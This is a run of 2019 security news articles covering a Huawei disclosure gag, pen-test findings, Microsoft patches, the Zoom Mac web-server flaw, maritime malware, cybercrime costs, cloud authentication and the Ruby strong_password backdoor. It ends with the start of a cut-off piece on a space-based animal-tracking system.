STE WILLIAMS

Huawei website ████ ██████ security flaws ██████ customer info and biz operations at risk: ███████ patched

Huawei has gagged infosec researchers from discussing now-patched critical vulnerabilities in the Chinese giant’s web systems that could have been exploited to steal customer information and derail the manufacturer’s operations.

A security research team at Italian outfit Swascan told The Register on Monday that, within the past month, it privately warned Huawei of flaws in the telecoms kit maker’s websites and online services, and that the exploitable bugs were, we’re told, duly fixed up.

However, it is unclear which parts of the Chinese giant’s web systems were at risk, what kinds of information could have been stolen or tampered with, which sections of the manufacturer’s operations were potentially affected, and whether or not the holes were exploited by intruders. Huawei has refused to comment. Swascan is banned from discussing it further, likely under an NDA as part of Huawei’s vulnerability disclosure procedures.

“Swascan experts have identified a number of critical issues within Huawei’s infrastructure and web applications,” the Swascan team at least stated in its Huawei-approved press statement on Sunday.

“The resulting responsible vulnerability disclosure revealed a few vulnerabilities ranked as critical that, if exploited by malicious attackers or cybercriminals, could have impacted business continuity, user’s data and information security and the regular operation of their services.”

When we pressed Swascan cofounder Pierguido Iezzi for more details, he told us: “Sorry, but we cannot give more details and/or information about the vulnerabilities discovered. The press release has been approved directly by Huawei.”

It is understood hackers aware of these critical vulnerabilities would have been able to exploit the programming blunders over the internet as the vulnerable web systems were public facing.

Huawei store in China with fallen promotional inflatable character on the ground

There’s Huawei too many vulns in Chinese giant’s firmware: Bug hunters slam pisspoor code

READ MORE

All Huawei has allowed Swascan to reveal is the types of bugs found: namely, out-of-bounds memory writes, out-of-bounds memory reads, and operating system command injection. Critical details including the number of holes found, the names of the patched services, any CVE numbers for the flaws, whether the bugs were exploited by miscreants, and when the patches were implemented, have all been omitted from the Huawei-sanitized Swascan report.

For what it’s worth, out-of-bounds memory writes typically involve overflowing a memory buffer with more data than expected, allowing a hacker to commandeer the execution flow of the attacked program. However, there are other types of out-of-bounds writes, so it’s not too helpful a description. Out-of-bounds memory reads can be used to steal information, or gain knowledge of the running software’s internals to defeat defenses such as ASLR. Again, it’s not very specific. Command injection does what it says on the tin, though there are many ways to achieve it.

Now, Huawei is under no obligation to talk about its security flaws. It could have gagged Swascan completely: plenty of companies demand silence from those who privately disclose vulnerabilities. However, given that customer data and operations were apparently at risk, Huawei’s secrecy in this matter will raise concerns. In the past, it has failed to implement patches properly, and been slammed for pathetic software engineer practices. Perhaps it fears it may not have fixed up all of its holes, and thus doesn’t want people poking around? Perhaps it’s embarrassed by its coding screwups? But everyone has bugs.

Of course, it could be that the bugs weren’t all that serious. But why would Huawei then remain silent?

This opaqueness comes as Huawei finds itself under the microscope for the security of its products and the supposedly close relationship the manufacturer enjoys with officials in China – a country so authoritarian it censored Winnie the Pooh. Huawei insists it operates independently of its Middle Kingdom masters.

The US government has made a point of publicly swearing off the use of any Huawei products, citing espionage concerns, and has been leaning on its allies to institute their own policies to exclude Huawei from providing any of the products used with new or existing wireless broadband networks.

While the biz was recently given hope that Washington DC might walk back the ban, government officials say they have no plans to do so at the moment. ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/09/huawei_to_address_security_holes/

What the AppSec Penetration Test Found

New data drills down on the types of security misconfigurations and challenges dogging application developers.

It should come as no surprise that misconfigured security by far remains the most common flaw found in applications today with the wave of exposed Amazon Web Services S3 buckets, HTTPS pages, and other high-profile mistakes exposed publicly over the past year. But new data gathered from real-world appsec penetration tests exposes just what types of configuration mistakes organizations are making that expose their data.

Pen-test-as-a-service firm Cobalt found in nearly 1,000 pen tests using its platform in 2018 that 60% of all security misconfigurations are mistakes with security headers and application settings. Security misconfiguration basically is where an app or setting doesn’t enforce security controls, according to Cobalt, which has seen misconfiguration as the No. 1 vulnerability for the past three years of its pen testing. Misconfiguration mistakes can include insecure default configurations, exposed S3 buckets, error messages that include sensitive information, and not keeping systems or software and development frameworks updated.

As obvious as properly setting security-headers sounds — ensuring the entire site is HTTPS and doesn’t revert to HTTP, for example — it isn’t always as easy for organizations to get it right. “These things are often an afterthought. Folks continue to be focused on getting their code completed, done, and released,” says Caroline Wong, chief security strategist at Cobalt, which will release its appsec pen-testing report this week. “It’s pretty easy to make mistakes.”

Ensuring that all Web connections use HTTPS, for example, can be tricky. “There are security features in [platforms] that take these [potential] mistakes out of the hands of developers, but developers still have to use them and include them,” she says.

Cobalt found that 30.1% of security misconfigurations were in security headers; 28.5% in application settings; 12.7% in encryption settings; 11.5% in server configuration; 9.6% in mobile settings; 4.9% in cloud settings; and 2.9% due to an improper security control. But the highest-risk mistakes, according to the pen-test report, are server configuration — such as unprotected file shares and unpatched operating systems — and application settings such as error messages that reveal sensitive information and software version disclosure.

Joe Sechman, vice president of Cobalt Core Labs, says security misconfiguration won’t be solved overnight, especially with the arrival of Internet of Things devices. “The grim observation is we don’t see misconfigurations magically turned around and fixed overnight,” he says. “I’ll bet it’s going to be a little worse in … IoT devices … with the rush to market [new] features.

But the good news, he says, is that progress is actually being made on the application side in general. “Be informed before you do pen testing,” he advises.

Cobalt also surveyed 150 security, DevOps, and other related professionals across various industries including cloud, retail, and finance, about their secure development practices and pen-testing strategies. Some 92% of those surveyed employ Agile/DevOps, and 20%, waterfall development methods. More than half write their own software, and 26% work with third parties to develop apps.

Cobalt’s Wong says the main nugget from the survey, which is part of the overall pen-test report, is that while most of the organizations want to conduct more appsec pen testing, the cost is prohibitive. Half of the organizations say it’s too expensive to perform pen tests more regularly than they currently do.

Some 80% say they pen test their apps because it improves their security; 60% because it’s part of their development life cycle; 57% because customers request it; 56% to prove security issues were fixed; 54% for regulatory compliance for customers; and 36% for risk assessment for third-party vendors.

Nearly half of the organizations say they pen test some 67% to 100% of their applications; that was the case of just 24% of organizations in last year’s survey by Cobalt.

Budget-wise, 60% say pen testing is a high priority and 2% say it’s a low priority, according to the new report.

Related Content:

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/application-security/what-the-appsec-penetration-test-found/d/d-id/1335195?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Microsoft Patches Zero-Day Vulnerabilities Under Active Attack

Microsoft issued fixes for 77 unique vulnerabilities this Patch Tuesday, including two zero-day privilege escalation vulnerabilities seen exploited in the wild.

Microsoft today patched 77 vulnerabilities and issued two advisories as part of its July security update. Two of these bugs are under active attack; six were publicly known at the time fixes were released.

Of the CVEs fixed today, 15 were categorized as Critical, 62 were rated Important, and one was ranked Moderate in severity. Patches address vulnerabilities in a range of Microsoft services including Microsoft Windows, Internet Explorer, Office and Office Services and Web Apps, Azure, Azure DevOps, .NET Framework, Visual Studio, SQL Server, ASP.NET, Exchange Server, and Open Source Software.

One of the vulnerabilities under active attack is CVE-2019-1132, a Win32k elevation of privilege flaw that exists when the Win32k component fails to properly handle objects in memory. Successful exploitation could lead to arbitrary code execution in kernel mode, which is normally reserved for trusted OS functions. An attacker would need access to a target system to exploit the bug and elevate privileges.

The other flaw seen exploited in the wild is CVE-2019-0880, another elevation of privilege vulnerability that exists in how splwow64.exe handles certain calls. On its own, the bug doesn’t enable arbitrary code execution, but it could allow arbitrary code to run if an attacker uses it in combination with another bug, such as a remote code execution bug or another elevation of privilege flaw. Given it’s under attack, it’s likely this was paired with a second vulnerability, but Microsoft has not shared details on this.

“These patches, though labeled as Important, should be prioritized, as they could be chained with other vulnerabilities to provide an attacker with complete system access,” says Qualys’ patch management expert Jimmy Graham.

Graham also points to CVE-2019-0785, a Critical memory corruption vulnerability that exists in Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server. An attacker with network access to the failover DHCP could run arbitrary code, he explains, noting that this patch should be prioritized for any organizations with systems running DHCP in failover mode.

“One of the most critical vulnerabilities this month is present in Microsoft DHCP server,” says Allan Liska, intelligence analyst for Recorded Future. “This memory corruption vulnerability affects all versions of Windows Server from 2012 – 2019 and it is remotely exploitable.” Recorded Future hasn’t seen the bug being abused in the wild, he continues, and it doesn’t appear to be a widely exploited flaw. “That does not mean organizations should not prioritize patching this vulnerability,” Liska says.

Another worth noting is publicly known vulnerability CVE-2019-1068, a remote code execution flaw that exists in Microsoft’s SQL Server when it incorrectly handles processing of internal functions. An attacker who successfully exploited this could execute code in the context of the SQL Server Database Engine service account, which they could do by sending a specially crafted query to an affected SQL server.

CVE-2019-1068 is categorized as Important, and it does require authentication, Graham points out. However, it could be chained with SQL injection to let an attacker completely compromise the server.

Satnam Narang, senior research engineer at Tenable, also points to CVE-2019-0887, a publicly known remote code execution vulnerability in Remote Desktop Services, formerly known as Terminal Services. “Exploitation of this vulnerability could result in arbitrary code execution, but requires an attacker to have already compromised a target system,” he explains. A successful attacker would have to first gain access to a system running RDS then wait for a victim system to connect to RDS. When the victim connects to the server, the attacker can exploit the bug to execute code on the victim’s system.

Microsoft patched four more publicly known bugs: Docker elevation of privilege vulnerability CVE-2018-15664; SymCrypt denial of service vulnerability CVE-2019-0865; Azure automation elevation of privilege vulnerability CVE-2019-0962; and Windows elevation of privilege vulnerability CVE-2019-1129.

Two advisories were also published today: one warns of a cross-site scripting vulnerability in Outlook on the Web. Another advisory alerts users to a Servicing Stack Update for all supported versions of Windows 10, Windows 8.1, Windows Server 2012 R2, and Windows Server 2012.

Related Content:

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/risk/microsoft-patches-zero-day-vulnerabilities-under-active-attack/d/d-id/1335197?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Zoom Client for Mac Exposing Users to Serious Risks

Videoconferencing software maker downplays risks and says mitigations are on the way.

Zoom Video Communications today announced changes to its videoconferencing client for Mac systems after a security researcher disclosed vulnerabilities in the software that, among other things, allows attackers to force users into video meetings without their permission.

Zoom acknowledged the issues in a blog post but described them as presenting less of a threat to Mac users than reported by Gradle security researcher Jonathan Leitschuh. Zoom, whose software is used by millions of Mac users, also announced changes to its bug bounty program to make it easier for security researchers to disclose vulnerabilities to the company.

Yesterday, Leitschuh disclosed a trio of issues in the Mac Zoom Client that he said put an estimated 4.5 million users — including some 750,000 organizations — at risk of information disclosure and other threats.

The most serious is a vulnerability that gives attackers a way to forcibly join a user to a Zoom video call even when that person did not grant permission for it. The problem has to do with a local Web server that Zoom installs on Macs.

According to Zoom, the Web server allows users using the Safari browser to join Zoom meetings without having to confirm they want to start the Zoom client first each time.

From a security standpoint, the problem is that any website a Mac user visits can also interact with the Web server, Leitschuh said in his post. This gives attackers an opportunity to use the Web server to get Mac users to join meetings without their permission, according to Leitschuh, who released proof-of-concept code showing how such a hack would work.

“All a website would need to do is embed [the code] in their website and any Zoom user will be instantly connected with their video running,” Leitschuh said. “This could be embedded in malicious ads, or it could be used as a part of a phishing campaign.”

What makes matters worse is the fact that the Web server remains on the system even if a user uninstalls the Zoom client. The Web server is designed to automatically reinstall the Zoom client without any user interaction at all, leaving open the possibility for future abuse, the security researcher said. “Having every Zoom user have a Web server that accepts HTTP GET requests that trigger code outside of the browser sandbox is painting a huge target on the back of Zoom,” according to Leitschuh.

One example Leitschuh highlighted is of attackers being able to execute a denial-of-service attack on a Mac simply by repeatedly pinging the Zoom Web server with requests for a bad number. That particular issue existed in Zoom’s Client version 4.4.2 and has since been addressed via a patch that Zoom issued in May, he said.

Feature or Bug?
In its blog, Zoom acknowledged that if a user has not configured the Zoom client to disable video when joining a meeting, an attacker might be able to view his video feed. However, by disabling the auto-starting of video, users can mitigate the threat. Also, because the Zoom client is visible to the user when it launches, any attempt to force a user into a video meeting would also become immediately apparent to the user, who could then shut it down immediately.

Zoom described the Web server as being of limited functionality and able to respond only to requests from the local machine. The company said the Web server was a legitimate approach to enabling users on Safari to join meetings with just one click. Other videoconferencing software tools have a similar feature, the company said.

At the same time, Zoom acknowledged it currently does not offer users an easy way to uninstall both the client and Web server components from their systems. To address that issue, the company will introduce a new uninstaller for Mac later this month that also will give users more control over their video settings. Users will be able to set their video preferences from their first Zoom meeting, and those preferences will stick for all future meetings unless they change them.

The fact that Zoom installs a local Web server by itself is not bad, says Tod Beardsley, research director at Rapid7.

The local server offers a way to address the different ways different browsers enforce same origin policies when it comes to “localhost,” he says. But “it’s definitely bad that it doesn’t uninstall when the application is uninstalled, since now the user is left with a running local Web server they don’t know about,” he says. An attacker armed with an exploit could deliver it via an iframe, for instance, that would run on the local Web server without the user’s knowledge.

Boris Cipot, senior security engineer at Synopsys, says in addition to disabling the auto-start video function in Zoom, users should also monitor Zoom for any notifications and patches for the issues disclosed this week.

“If you don’t normally use Zoom and it just happened that you were invited in a Zoom session, you have the risk the vulnerability also on your device,” he says. “This means that you are now a potential target for someone who wants to use this vulnerability as well.”  

Related Content:

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/zoom-client-for-mac-exposing-users-to-serious-risks/d/d-id/1335196?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Coast Guard Warns Shipping Firms of Maritime Cyberattacks

A commercial vessel suffered a significant malware attack in February, prompting the US Coast Guard to issues an advisory to all shipping companies: Here be malware.

In February 2019, a large ship bound for New York City radioed the US Coast Guard warning that the vessel was “experiencing a significant cyber incident impacting their shipboard network.” 

The Coast Guard led an incident-response team to investigate the issue and found that malware had infected the ships systems and significantly degraded functionality. Fortunately, essential systems for the control of the vessel were unimpeded.

On July 8, the military branch issued an alert to commercial vessels strongly recommending that they improve their cybersecurity in the wake of the incident, including segmenting shipboard networks, enforcing per-user passwords and roles, installing basic security protections, and patching regularly. 

“It is unknown whether this vessel is representative of the current state of cybersecurity aboard deep-draft vessels,” the Coast Guard’s alert stated. “However, with engines that are controlled by mouse clicks, and growing reliance on electronic charting and navigation systems, protecting these systems with proper cybersecurity measures is as essential as controlling physical access to the ship or performing routine maintenance on traditional machinery.”

The focus on the security and safety of maritime networks is not new. Following the Stuxnet attack in 2009, which decimated the ability of Iran to enrich uranium ore and demonstrated the ability of cyber operations to impact physical infrastructure, government and industry began to look to their own defenses. Among those scrutinized sectors were maritime and shipping.

The European Network and Information Security Agency, now known as the European Union Agency for Cybersecurity, analyzed the state of maritime cybersecurity in 2011, releasing a report late that year. The report found that cybersecurity awareness in the maritime sector was “low to non-existent” and the focus of nearly all security measures were on physical systems. 

Six years later, the industry had woken up to the threats but still moved at a slow pace, says Markus Schmitz, managing director of SOFTimpact, a Cyprus-based IT solutions provider to the maritime industry. In 2017, however, the NotPetya ransomware attack hit computers at shipping firm AP Moller-Maersk, requiring the firm to reinstall 4,000 servers, 45,000 workstations, and 2,500 applications in less than two weeks, costing the firm between $250 million and $300 million.

The incident spurred the industry to greater efforts, focusing on cybersecurity issues, including establishing industry groups and vetting initiatives. Yet companies in the sector are still not ready, says Schmitz. 

Incidents like NotPetya are “bound to happen and such random incidents will happen to other shipping companies as well as companies of any other industry,” Schmitz says. “In this regard, the shipping industry is neither more nor less vulnerable than any other globally operating business.”

Yet more than 90% of the world’s trade is carried by shipping, according to the United Nations’ International Maritime Organization, and that puts the industry in the crosshairs of potential targeted attackers. Because the shipboard systems mix IT and operational technology (OT), companies are vulnerable to losing control of ships due to a cyberattack. 

In addition, the business model of global shipping makes the vessels even more vulnerable, SOFTimpact’s Schmitz says. Crew tend to be temporary — independent contractors on voyage contracts — an arrangement that makes them hard to train and usually unfamiliar with a specific company’s information security policy. In fact, most ships are operated with crew contracted through multiple levels of outsourcing, making assigning responsibility for information systems — and incidents to those systems — nearly impossible. Good luck telling the captain or a port pilot that they cannot use a USB stick, he says. 

“The role of the in-house IT must be extended to include the OT systems,” Schmitz says. “The in-house IT must be trained on OT systems, must spend time onboard, must be included in purchasing processes, and must take responsibility.”

The issues apparently plagued the commercial ship mentioned in the US Coast Guard alert. The ship’s crew knew, but did not care, that the entire system was insecure.

“Prior to the incident, the security risk presented by the shipboard network was well known among the crew,” the alert stated. “Although most crew members didn’t use onboard computers to check personal email, make online purchases or check their bank accounts, the same shipboard network was used for official business — to update electronic charts, manage cargo data and communicate with shore-side facilities, pilots, agents, and the Coast Guard.”

The US Coast Guard recommends that owners of vessels and the shipping firms that use the vessels require regular cybersecurity assessments. Other recommendations can be found on the Coast Guard’s cybersecurity page.

For the most part, shipboard networks do not pose a great risk until they are specifically targeted by attackers who aim to compromise the operational networks. While those attacks are not common, they will come, says SOFTimpact’s Schmitz.

“There is no reason to panic, but there is a problem and in many shipping companies, it has not been dealt with in an adequate (or organized) manner,” he says.

Related Content

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/coast-guard-warns-shipping-firms-of-maritime-cyberattacks/d/d-id/1335198?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Financial Impact of Cybercrime Exceeded $45B in 2018

Cybersecurity analysts explore a range of industry research to examine trends around cyber incidents and their financial impact.

Cybersecurity incidents cost an estimated $45 billion in 2018, according to a new report that aggregates data from different types of reported security incidents from around the world.

It’s difficult to get a complete picture of the cyber incident landscape, says Jeff Wilbur, technical director of the Internet Society’s Online Trust Alliance (OTA), which today published its “2018 Cyber Incident Breach Trends Report.” “Everyone’s viewing it from their own lens,” he says. 

When the OTA published its first edition of this report 11 years ago, it only focused on data breaches, Wilbur adds. A rapidly evolving threat landscape forced it to broaden its scope. 

“A few years ago we realized this underrepresented the number of cyber incidents,” he explains. “We started looking at adding business email compromise, ransomware, and other DDoS attacks because those are orders of magnitude larger than breaches that get reported.

What’s interesting, he continues, is many of the techniques cybercriminals use to break into systems have largely remained the same: They use employee credentials, for example, or exploit a known vulnerability in an organization that hasn’t updated its software. “The ways to get in have been relatively constant for a while,” says Wilbur, though there are some changes.

Internet of Things (IoT) devices, for example, have introduced new ways of breaking into organizations, as has organizations’ growing reliance on third-party vendors. “The clever way to get into systems is through third parties that may be less secure,” Wilbur adds. More attackers are breaking into target organizations by planting malware on or gaining unauthorized access into vendor systems.

Supply chain- and IoT-based attacks may be growing, but email attacks and vulnerability exploitation remain the most common ways to break into a target system. However, the actions cybercriminals take once they gain access to a network continue to shift over time.

Tracking Trends in Cybercrime
In their exploration of how attack patterns fluctuate over time, researchers noticed ransomware declined overall between 2017 and 2018, though it specifically increased among enterprise users. Cryptojacking became prominent in late 2017 and grew in 2018; however, it later started to rapidly decline as cryptocurrency’s value plummeted and attackers sought new ways to generate illicit income. Researchers found reports of 1.3 million incidents of cryptojacking in 2018 and 500,000 of ransomware.

Distributed denial-of-service (DDoS) attacks were reportedly down in 2018, though some reports indicate they’re still causing chaos in some industries. The challenge with DDoS attacks is determining how many attacks are successful, researchers point out. There is no aggregated reporting, and most businesses hesitate to acknowledge where they are vulnerable.

Business email compromise (BEC) was up significantly in 2018, researchers say. The FBI’s Internet Crime Complaint Center reported more than 20,000 BEC incidents in the US resulted in nearly $1.3 billion in losses in 2018 – up from 16,000 incidents and $677 million lost in 2017.

It’s one of many types of attacks contributing to the overall cost of cyber incidents in 2018. While financial impact is tough to determine, strong estimates put the cost of ransomware at $8 billion and credential stuffing at $5 billion. Some estimates are more general; for example, the Ponemon Institute reported the average cost of a data breach grew to hit $3.86 million.

Even with loose estimates, researchers estimate a total financial impact of at least $45 billion in 2018.

What does this data mean for the rest of 2019? “We’ve seen more supply chain attacks, [and] we’ve seen more ransomware, especially in the US,” he says, pointing to the new trend of cybercriminals targeting US cities including Baltimore, Maryland; Riviera Beach, Florida; and Atlanta, Georgia. While cryptojacking continues to drop off, we can expect to see more of the same threats we saw in late 2018 and early 2019, Wilbur says.

Back to Basics
As Wilbur explains, attack vectors leading to major breaches are typically simple.

These can be seen in many of the high-profile security incidents that made headlines in 2018. The breach of Aadhaar, India’s national ID database, compromised 1.1 billion records and was attributed to an unsecured API. An attack on the Marriott/Starwood system affected 383 million people and was caused by intruders who had been on the Starwood network since 2014 and would have been found by a routine network check prior to its acquisition by Marriott.

Given OTA found 95% of data breaches in 2018 were preventable, it seems organizations are not taking simple steps to protect themselves. “The same rules apply, so it’s actually the trend that organizations aren’t doing the basics really well,” he says.

This puts pressure on organizations to step up their game: you want to be the organization that, when attackers start to intrude, they don’t find a vulnerability and move on to an easier target.

Related Content:

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/risk/financial-impact-of-cybercrime-exceeded-$45b-in-2018/d/d-id/1335199?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Organizations Are Adapting Authentication for Cloud Applications

Companies see the changing demands of cloud identity management but are mixed in their responses to those demands.

Cloud services are becoming the norm in enterprise IT, but that doesn’t mean that they come without concerns. A new survey shows that nearly half of all enterprises believe that their cloud applications make them more of a target for cyberattacks. The cloud ranks third on the list of reasons executives think they might be attacked, just behind unprotected infrastructure such as Internet of Things devices (54%) and web portals (50%).

The report, the “2019 Thales Access Management Index,” is based on a survey sponsored by Thales and conducted by Vanson Bourne. The survey received responses from 1,050 executives in 11 countries; it asked them questions about both their concerns and the technology they’re employing to respond to those concerns.

“Organizations realize now that they are depending on cloud resources, cloud services, and cloud applications to run their business,” says Francois Lasnier, vice president of authentication and access management at Thales. The realization, though, has its limits.

“When you ask a lot of the CISOs, their initial reaction is that they only use a few applications or cloud services,” Lasnier says. “But when you start digging, you realize that sometimes there is a factor of 10 between what a CISO or IT administrator recognizes in the cloud application count versus what is actually the cloud usage.”

Even without an accurate understanding of their cloud exposure, the IT executives are broadly aware of the threats to cloud applications. Ninety-four percent of the executives say that their organizations’ security policies have been influenced by consumer breaches occurring in the last 12 months. The ongoing recognition of email as an attack vector is one of those responses.

“If you can hack into the email system of an organization, then you can start doing ID theft, and then you can start elevating your privilege,” Lasnier explains. Once the process has begun, attackers can then create fake identities, navigate within the company network, and wreak havoc.

The survey shows that access management is evolving to respond to the threat facing cloud applications. According to the results, 70% of companies have begun using two-factor authentication, 53% are using single sign-on (SSO), and 36% have begun using “smart” SSO — SSO that uses policy-based privileges for individual applications and network segments, along with multiple authentication stages when privilege escalation is required.

There are ongoing contradictions in the understanding that executives bring to the issues around authentication and application access. For example, nearly half of the IT executives surveyed said that smart SSO (49%) and biometric multifactor authentication (47%) are among the best tools for protecting cloud and web access, while only 24% saw social identity credentials (using Facebook, Google, or Twitter accounts for authentication) as a best practice.

However, more than half (56%) then said that they would allow employees to log in to enterprise resources using social media credentials for authentication.

Lasnier says that the confusion is largely a result of a rapidly changing enterprise environment that has seen the cloud, bring-your-own-device efforts, exceptional employee mobility, and other factors thrown into a mix that requires secure authentication and access management for users.

The access decision that was once black and white is now multivariable, Lasnier says. “Companies are looking now not just at access management that’s a single point function, but at bundling identity to provide secure access management to applications and to dictate services like encryption rules that can further protect data assets,” he says.

Related content:

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/cloud/organizations-are-adapting-authentication-for-cloud-applications/d/d-id/1335200?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Backdoor discovered in Ruby strong_password library

An eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.

A close shave, then. While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, many of which might have used the default library, strong_password, in its infected version 0.0.7.

The discovery came about after Epion Health developer, Tute Costa, noticed something unusual when carefully updating a family of libraries used by his company’s dev to fix bugs and security vulnerabilities.

When he looked at the strong_password gem on RubyGems.org, he couldn’t locate a changelog explaining how it got to the updated version from 0.0.6, an event which happened on 25 June 2019.

The previous GitHub version had been updated in October 2018. Comparing the two versions, he noticed the mystery 0.0.7 version embedded a download link which:

Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.

The backdoor would download code from the Pastebin address for production sites, giving the attackers the power of remote code execution, silently hijacking any websites unfortunate to have updated to the rogue strong_password gem.

Adding to this, the versions had been published by an empty account under a different name (probably the victim of a Pastebin account hijacking) to the official maintainer, Brian McManus, who replied to an email from Costa to say:

The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now.

The latest issue is identified as CVE-2019-13354. The infected library has now been pulled and replaced with 0.0.8.

Part of a pattern

This wasn’t a speculative attack – somebody thought about what they were doing and set out to insert the backdoor in a way that might not be noticed straight away.

It also fits a troubling pattern of recent targeting of Ruby libraries, including the RCE discovered inside the Bootstrap-Sass Ruby library in April.

That hijacking was noticed even quicker than strong_password’s, but the sheer number of libraries used by RoR (and other development frameworks in the firing line) raises the issue of how much oversight is appropriate when new versions appear.

Luckily, on this occasion, a developer was paying attention. When it comes to security, sometimes someone noticing that something is awry is all that stands between a large community of developers and disaster.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/4pxSq0OgLT8/

Zoom flaw could force you into a meeting, expose your video feed

Zoom, a company that sells video conferencing software for the business market, is tweaking the app to fix a vulnerability in its software that allows malicious websites to force users into a Zoom call with the webcam turned on.

The flaw was discovered by security researcher Jonathan Leitschuh, who documented it in a blog post on Monday.

He said that initially, the vulnerability would have also allowed any webpage to inflict a denial of service (DoS) attack on a Mac by repeatedly forcing a user onto an invalid call. But that DoS vulnerability – CVE-2019-13449 – was fixed in version 4.4.2 of the macOS client.

In discussions with the Zoom team over the past few weeks, Leitschuh said that Zoom had proposed a fix to the hijacking vulnerability: namely, digitally signing requests from websites that are made to the client.

But the researcher said that wouldn’t have solved the problem, given that an attacker would be able to set up a server to make requests to the Zoom site in order to acquire a valid digital signature before contacting the client.

Note. The original version of this article stated that this flaw was specific to Zoom on the Mac, but Jonathan Leitschuh has confirmed in a tweet that this issue can affect Windows users too. See below for how to prevent Zoom turning on your camera by default when you join a meeting. [Updated 2019-07-09T18:20Z]

There was another problem the researcher found: when setting up a meeting, you can enable the video setting to “Participants: On” for all those who join a meeting. That removes a participant’s choice of whether or not to have their video connected and instead automatically joins them to a meeting with their video on.

Because the Zoom client runs in the background, an attacker could embed a Zoom join link in their website, causing any Zoom user to be instantly connected, with their video feed turned on, even if they aren’t running the Zoom software in the foreground.

Zoom sent a statement to multiple publications in which it said that it developed the local web server in response to changes that Apple introduced in Safari 12.

It did so in order to save the user some clicks in what had become a cumbersome log-in, it said:

[Running a local server in the background was a] legitimate solution to a poor user experience, enabling our users to have seamless, one-click-to-join meetings, which is our key product differentiator.

Starting this month, Zoom will save users’ and administrators’ preferences for whether video will be turned on or not. On all of its platforms, it will save the user’s choice on whether or not to turn off video in their first call and will apply that choice to future meetings.

From Zoom’s statement:

All first-time Zoom users, upon joining their first meeting from a given device, are asked whether they would like their video to be turned OFF.

For subsequent meetings, users can configure their client video settings to turn OFF video when joining a meeting. Additionally, system administrators can pre-configure video settings for supported devices at the time of install or change the configuration at anytime.

What to do?

Fortunately there’s something you can do to mitigate against the issue:

  • Launch the Zoom app.
  • Open the Settings page (on a Mac, use Preferences or press Command-Comma).
  • Click the Video option.
  • Enable the setting Turn off my video when joining a meeting.

On a Mac, you can easily block Zoom’s access to your camera altogether, via the System Preferences settings:

  • Click on the Apple menu (top left corner of your screen).
  • Choose System Preferences…
  • Click the Security Privacy icon.
  • Click the Camera option.
  • Review which apps have access to your camera.

(To alter the setting for any app, you will first need to click on the padlock icon and enter your password to authorise the changes. That’s a precaution to prevent ill-behaved or buggy apps simply changing the setting back.)

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/VaJP9KjIncg/

Boffins ready to go live with system that will track creatures great and small from space

Boffins at the Max Planck Institute for Ornithology are finally ready to switch on Icarus – a system that will track the migration of animals by using an antenna installed at the International Space Station (ISS).

On the ground, scientists have been equipping hundreds of animals with miniature satellite transmitters. On Wednesday, astronauts will flip the switch aboard the ISS and start operation of the ground station in Immenstaad, Germany.

Following extensive tests using simulated transmitters, the system will be made available to the scientific community before the end of the year.

Icarus (International Cooperation for Animal Research Using Space) is a collaboration between German and Russian scientists in the works since 2002. It involves Russian space agency Roskosmos, the German Aerospace Centre (DLR), and the Max Planck Institute for Ornithology, among others.

As part of the project, Russian cosmonauts installed the three-metre antenna – and its onboard computer – on an ISS module called Zvezda (star) during a spacewalk in August 2018.

